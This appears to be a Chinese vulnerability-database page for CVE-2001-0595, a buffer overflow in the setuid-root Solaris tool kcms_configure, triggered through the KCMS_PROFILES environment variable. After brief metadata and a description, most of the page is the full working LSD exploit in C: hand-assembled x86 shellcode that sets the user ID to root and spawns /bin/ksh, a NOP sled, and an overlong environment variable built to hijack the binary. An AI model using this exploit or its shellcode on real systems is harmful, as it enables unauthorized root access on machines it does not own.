Solaris kcms_configure 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105625 漏洞类型 边界条件错误
发布时间 1999-12-01 更新时间 2006-11-14
CVE编号 CVE-2001-0595 CNNVD-ID CNNVD-200108-018
漏洞平台 Solaris CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/20768
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-018
|漏洞详情
CVE(CAN)ID:CVE-2001-0595Solaris所带的配置工具"kcms_configure"易于遭受缓冲区溢出攻击,攻击者可以获取root权限。kcms_configure使用到环境变量KCMS_PROFILES,而动态链接库kcsSUNWIOsolf.so提供了对环境变量KCMS_PROFILES的解析功能。如果该环境变量的值超长,运行kcms_configure时就会发生缓冲区溢出,因为kcms_configure是setuid-to-root的,本地攻击者将获取root权限。<*来源:LSD(contact@lsd-pl.net)*>
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2605/info
 
The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker.
 
The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root.
 
Exploits are available against Solaris x86 and Solaris Sparc.
*/

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 16000
#define ADRNUM 2900

char setuidshellcode[]=
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x08"             /* jmp     <setuidshellcode+12>   */
    "\x5f"                 /* popl    %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x47\x01"         /* movb    %al,0x1(%edi)          */
    "\xeb\x0d"             /* jmp     <setuidshellcode+25>   */
    "\xe8\xf3\xff\xff\xff" /* call    <setuidshellcode+4>    */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xe8\xee\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xeb\x16"             /* jmp     <setuidshellcode+59>   */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
    "\x52"                 /* pushl   %edx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x7(%edx)          */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xe8\xd6\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xe8\xe5\xff\xff\xff" /* call    <setuidshellcode+37>   */
    "/bin/ksh"
;

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

main(int argc,char **argv){
    char buffer[20000],*b,adr[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=&buffer[0];
    envp[1]=&buffer[17000];
    envp[2]=display;
    envp[3]=0;

    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
    *b=0;

    b=&buffer[17000];
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}
|参考资料

来源:XF
名称:solaris-kcssunwiosolf-bo(6365)
链接:http://xforce.iss.net/static/6365.php
来源:BID
名称:2605
链接:http://www.securityfocus.com/bid/2605
来源:BUGTRAQ
名称:20010411[LSD]SolariskcsSUNWIOsolf.soanddtsessionvulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0203.html